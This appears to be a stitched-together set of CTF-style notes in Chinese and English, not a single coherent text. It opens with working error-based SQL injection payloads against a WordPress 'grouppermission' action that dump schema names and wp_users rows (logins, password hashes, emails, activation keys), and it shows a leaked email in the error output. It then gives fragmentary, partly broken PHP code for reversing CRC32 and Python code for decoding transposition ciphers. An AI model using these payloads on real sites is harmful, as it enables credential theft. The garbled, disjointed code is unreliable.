POST action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select distinct table_schema from information_schema.tables limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
使用同样的方法注入得到wp_user里面的数据: 注入wp_users表中的数据:
1 2 3 4
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_login,user_pass,0x20,user_status,0x20,user_nicename,0x20,user_email,0x20,user_activation_key) from wordpress.wp_users limit 1,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat((select concat(id,user_email,0x20,hex(user_activation_key),0x20) from wordpress.wp_users limit 0,1 ),floor(rand(0)*2))x from information_schema.tables group by x)a)#
获得数据: Error: Duplicate entry '1sycweb3@163.com 7136775859785A39716B74765968674567563950 1' for key 'group_key'
//reflection in 32 bits of crc32 polynomial 0x04C11DB7 $poly_reflected=0xEDB88320;
//=0xFFFFFFFF; //keep track of register value after each call static $reg=0xFFFFFFFF;
//initialize register on first call if($first_call) $reg=0xFFFFFFFF;
$n=strlen($str); $zeros=$n<4 ? $n : 4;
//xor first $zeros=min(4,strlen($str)) bytes into the register for($i=0;$i<$zeros;$i++) $reg^=ord($str{$i})<<$i*8;
//now for the rest of the string for($i=4;$i<$n;$i++){ $next_char=ord($str{$i}); for($j=0;$j<8;$j++) $reg=(($reg>>1&0x7FFFFFFF)|($next_char>>$j&1)<<0x1F) ^($reg&1)*$poly_reflected; }
//put in enough zeros at the end for($i=0;$i<$zeros*8;$i++) $reg=($reg>>1&0x7FFFFFFF)^($reg&1)*$poly_reflected;
echo'$reg:'.$reg."<br />"; //xor the register with 0xFFFFFFFF return ~$reg; }
functionbitbybit_crc32_reverse( $data){ //reflection in 32 bits of crc32 polynomial 0x04C11DB7 $poly_reflected=0xEDB88320;
//=0xFFFFFFFF; //keep track of register value after each call $reg= ~$data ;
//initialize register on first call
$n=strlen($data); $zeros=$n<4 ? $n : 4;
//put in enough zeros at the end for($i=0;$i<$zeros*8;$i++) { if(($reg>>31)&1) { $reg=($reg)^$poly_reflected; $reg = ($reg << 1)|1; } else { $reg = ($reg << 1)&0xFFFFFFFE; } }
echo'$reg:'.$reg."<br />"; //xor the register with 0xFFFFFFFF return ~$reg;
最简单的例子是栅栏密码,按照对角线的顺序写出明文,而按行的顺序读出作为密文。例如,用深度为2的栅栏技术加密信息“meet me after the toga party”,可写为
m e m a t r h t g p r y e t e f e t e o a a t
加密后的信息是MEMATRHTGPRYETEFETEOAAT 这种技巧是对密码分析者来说实在微不足道。一个更复杂的方案是把消息一行一行地写成矩形块,然后按列读出,但是把列的次序打乱。列的次序就是算法的密钥。例如: 密钥 4312567 明文 a t t a c k 明文 p o s t p o n 明文 e u n t i l 明文 t w o x y
matrix = genMatrix(rows,cols) i = 0 row = 0 col = 0 for char in chars : row = i % rows col = key[i / rows] matrix[row][col] = char i = i + 1 for i in range(rows) : for j in range(cols): sys.stdout.write(str(matrix[i][j]))
def test(): chars = 'tsuwatnoto tape cpt koix nly' key_orgi = [4,3,1,2,5,6,7] key = [2,3,1,0,4,5,6] decode(chars,key) def go(): key_orig = [7, 6, 5, 2, 1, 3, 4] key = [4,3,5,6,2,1,0] # for line in open('ciphertext.txt'): #chars = 'pxh !ra o efpy s y i(amhrrfcafc es tixt u eatehsatiid ayefneha oe eid.or enn ' f = open('ciphertext.txt') chars = f.read() decode(chars,key)